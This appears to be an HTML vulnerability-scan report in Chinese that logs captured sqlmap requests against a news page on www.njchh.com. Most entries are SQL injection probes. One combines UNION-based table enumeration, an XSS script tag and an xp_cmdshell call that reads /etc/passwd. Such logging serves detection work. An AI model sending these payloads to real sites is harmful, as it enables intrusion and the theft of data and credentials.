<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Scan Report</title><style type="text/css" media="all">
	UL.ulist {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px;};
	LI.list  {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc;}
	LI.list0 {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc; color:#357abd;}
	LI.list1 {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc; color:#4cae4c;}
	LI.list2 {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc; color:#fdc431;}
	LI.list3 {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc; color:#ee9336;}
	LI.list4 {padding: 0 10px; line-height:25px; margin-bottom:0px; margin-top:0px; list-style: disc; color:#d43f3a;}

	html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
		margin: 0;
		padding: 0;
		border: 0;
		font-size: 100%;
		font: inherit;
		vertical-align: baseline;
		-webkit-text-size-adjust: none;
	}

	html, body {
		font-family: helvetica, arial, sans-serif;
		width: 100%;
		color: #263645;
		font-size: 12px;
		background: #efefef;
	}

	a, a:visited, a:active {
		color: #004a97;
	}

	a:hover {
		color: #00253d;
	}

	.container_16 {
		margin: 0 auto;
		padding: 0 14px 14px 14px;
		background: #fff;
		border-top: #425363 solid 7px;
		box-shadow: 0 2px 10px rgba(0, 0, 0, .2);
		margin-bottom: 20px;
		border-radius: 0 0 5px 5px;
	}

	#reportContent {
		width: 100%;
	}

	h1.classtitle {
		padding: 15px 0 10px 0;
		border-bottom: 1px dotted #ccc;
		margin: 0 0 15px 0;
	}

	h2.classtitle {
		color: #00a5b5;
		font-weight: normal;
		font-size: 22px;
		margin: 0;
		padding: 0;
	}

	h2.date {
		font-size: 14px;
		color: #768591;
		margin: 0;
		padding: 0;
		font-weight: normal;
	}

	.reportinfo {
		display: block;
		width: 100%;
		font-size: 16px;
		padding: 0 0 15px 0;
		margin: 0 0 5px 0;
		font-weight: normal;
		border-bottom: 1px dotted #ccc;
	}

	.reportpadding {
		padding: 15px 0 0 0 !important;
	}

	.classtoc {
		display: block;
		font-size: 18px;
		color: #777779;
		padding: 15px 0;
		margin: 15px 0 0 0;
	}

	h1.classchapter {
		background: #425363;
		color: #fff;
		font-weight: bold;
		font-size: 16px;
		padding: 6px 10px;
		margin: 10px 0 0 0;
		border-radius: 4px 4px 0 0;
	}

	h2.classsection {
		display: block;
		background: #425363;
		color: #fff;
		font-weight: bold;
		font-size: 14px;
		padding: 6px 10px;
		margin: 30px 0 0 0;
		border-radius: 4px 4px 0 0;
	}

	h2.classh1  {
		display: block;
		background: #efefef;
		font-weight: bold;
		font-size: 13px;
		padding: 6px 10px;
	}

	.classtext {
		font-size: 13px;
		line-height: 18px;
	}

	div#reportContent div span.classtext {
		padding: 6px 10px;
		display: inline-block;
	}

	h2.classsubsection {
		background: #768591;
		color: #fff;
		font-weight: bold;
		font-size: 13px;
		padding: 6px 10px;
	}

	.classheader h1 {
		color: #fff;
		font-weight: bold;
		font-size: 15px;
		padding: 0 10px;
		text-align: center;
	}

	.reportinfo b {
		font-weight: bold;
	}

	h3.classtitle  {
		color: #69737b;
		font-size: 16px;
		padding: 0 10px;
	}

	.classsection_sub tr, td {
		color: #053958;
		font-size: 13px;
		padding: 0 10px;
	}

	td {
		padding: 6px 10px;
	}

	h2.classsection, h2.classsection0, h2.classsection1, h2.classsection2, h2.classsection3, h2.classsection4 {
		background: #053958;
		color: #fff;
		font-weight: bold;
		font-size: 13px;
		padding: 6px 10px;
		margin-bottom: 0px;
		margin-top: 10px;
	}

	.classcell4, h2.classsection4 {
		background-color: #d43f3a;
	}

	.classcell3, h2.classsection3 {
		background-color: #ee9336;
	}

	.classcell2, h2.classsection2 {
		background-color: #fdc431;
	}

	.classcell1, h2.classsection1 {
		background-color: #4cae4c;
	}

	.classcell0, h2.classsection0 {
		background-color: #357abd;
	}


	#copyright {
		display: block;
		width: 100%;
		text-align: center;
		font-size: 12px;
		color: #A9A8A9;
		padding: 6px 0 20px 0;
	}

	#copyright a, #copyright a:visited, #copyright a:active {
		color: #A9A8A9;
	}

	div.icon {
		display: none;
	}

	.nopadding {
		padding: 0 !important;
	}

	body.email h2.classh1 {
		display: block;
		margin: 20px 0 0 0;
		background: #425363;
		color: #fff;
		font-weight: bold;
		font-size: 14px;
		padding: 6px 10px;
		border-radius: 4px 4px 0 0;
	}

	body.email div#reportContent div span.classtext {
		padding: 0;
		display: inline;
	}

	body.email h2.tips {
		background: #004a97 !important;
	}

	body.email h2.errors {
		background: #c00 !important;
	}

	body.email h2.classsection {
		display: none;
	}

	.classtoc1 a {
		font-size: 16px;
	}

	.classtoc2 a {
		font-size: 13px;
		padding: 0 20px;
	}

	h2.classh2  {
		background: #f8f8f8;
		font-weight: bold;
		font-size: 13px;
		padding: 6px 10px;
	}

	.classpre {
		display: block;
		font-size: 13px;
		font-family: Courier New, Courier, monospace;
		padding: 10px;
		color: #000;
	}

	.classh1_grey h2 {
		background: #eaeaea;
		color:#053958;
		font-size: 13px;
		padding: 0 10px;
		margin-top:0px;
		margin-bottom:2px;
	}

	@media only screen and (max-device-width: 480px) {
		html, body {
			display: block;
			min-width: 480px;
			background: #fff;
		}

		table {
			table-layout: auto !important;
		}

		table td {
			word-wrap: break-word;
		}

		table.container_16 {
			width: 100%;
			padding: 0 4% 20px 4%;
			background: #fff;
			border-top: #425363 solid 7px;
			box-shadow: none !important;
			margin-bottom: 20px;
			border-radius: 0;
		}

		#copyright {
			display: block;
			width: 90%;
			text-align: center;
			font-size: 10px;
			color: #A9A8A9;
			padding: 5px 0 20px 0;
			border-top: 1px dotted #ccc;
			margin: 0 auto;
			line-height: 16px;
		}

		.classtitle img {
			display: block;
			margin: 0 auto;
		}
	}
</style><script type="text/javascript">
		function toggle(divId) {
			var divObj = document.getElementById(divId);
			if (divObj) {
				var displayType = divObj.style.display;
				if (displayType == "" || displayType == "block") {
					divObj.style.display = "none";
				} else {
					divObj.style.display = "block";
				}
			}
		}

		function ceall(flag) {
			var divs = document.getElementsByTagName("div");
			var i = 0;
			for (i = 0; i < divs.length; i++) {
				if (divs[i].getAttribute("id") != null && divs[i].getAttribute("id").match('btag-')) {
					if (flag == 0) {
						divs[i].style.display = "none";
					} else {
						divs[i].style.display = "block";
					}
				}
			}
		}
		</script>
</head>
<body class=""><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td align="center" valign="top" class="nopadding" style="vertical-align: top"><table cellpadding="0" cellspacing="0" border="0" width="80%" bgcolor="#FFFFFF" class="container_16"><tbody><tr><td><table xmlns="" cellpadding="0" cellspacing="0" border="0" width="100%">

<tbody><tr><td class="nopadding"><h1 class="classtitle"><img src="data:image/png;base64,…" width="247" height="77" border="0" alt="Nessus Report" style="display: block;"></h1></td></tr>
<tr><td class="nopadding"><h2 class="classtitle">综合分析报告</h2></td></tr>
<tr><td class="nopadding"><h2 class="date">生成日期：</h2></td></tr>
<tr><td class="reportpadding"><div class="reportinfo"></div></td></tr>
</tbody></table>
<div id="reportContent"><span xmlns="" class="classtoc">漏洞分析报告</span><table xmlns="">

<tbody><tr><td>

</td></tr>


</tbody></table>
<h1 xmlns="" class="classchapter" id="idm8724736">快捷栏</h1>
<table xmlns="">
<tbody><tr width="100%" onclick="ceall(0)" onmouseover="this.style.cursor='pointer'" title="Collapse"><td align="left" width="100%">[-] 闭合所有标签</td></tr>
<tr width="100%" onclick="ceall(1)" onmouseover="this.style.cursor='pointer'" title="Expand"><td align="left" width="100%">[+] 打开所有标签</td></tr>
</tbody></table>




        <div id="reportContent"><span xmlns="" class="classtoc">协议分析报告</span><table xmlns="">

        <h2 xmlns="" class="classsection" id="idm8793216">外部引入</h2>

        <table xmlns="" width="100%">
        <tbody><tr>

        </tr>
        </tbody></table>




        <h2 xmlns="" class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Host Information</h2>
        <table xmlns="" width="100%">
            <tbody>
                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">IP:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">外部引入</span></td>
                </tr>
                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">Hardware:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">外部引入</span></td>
                </tr>
            </tbody>
        </table>
        <h2 xmlns="" class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Results Summary</h2>
        <table xmlns="" width="100%">
            <tbody>
                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">数据包总数:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">2083</span></td>
                </tr>
                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">漏洞规则匹配总数:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">63</span></td>
                </tr>

                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">使用的匹配规则:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">{&quot;Other&quot;: [&quot;other&quot;, &quot;GET&quot;]}</span></td>
                </tr>

                <tr>
                    <td width="20%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;">详细报告下载地址:</span></td>
                    <td width="80%" valign="top" class="classcell"><span class="classtext" style="color: #263645; font-weight: normal;"><a href=http://10.10.10.241:6060/repoterdown/testother/>http://10.10.10.241:6060/repoterdown/testother/</a></span></td>


                </tr>
            </tbody>
        </table>
        <h2 xmlns="" class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->漏洞匹配数据包信息</h2>

        <h2 xmlns="" class="classsubsection ">示例</h2>

    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/58-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        58-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/58-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/86-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        86-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/86-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255&vOYz%3D6839%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/152-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        152-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/152-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=9535&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/137-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        137-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/137-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=1675&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/167-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        167-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/167-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%29%2C%22.%28%29%29%27%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/113-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        113-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/113-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/179-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        179-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/179-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=9323-9068&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/228-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        228-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/228-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%29%20AND%206250%3D6250%20AND%20%281090%3D1090&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/256-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        256-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/256-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%206250%3D6250&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/206-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        206-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/206-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%27tRaclh%3C%27%22%3EcQOLGy&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/218-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        218-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/218-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%29%20AND%209178%3D7117%20AND%20%287556%3D7556&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
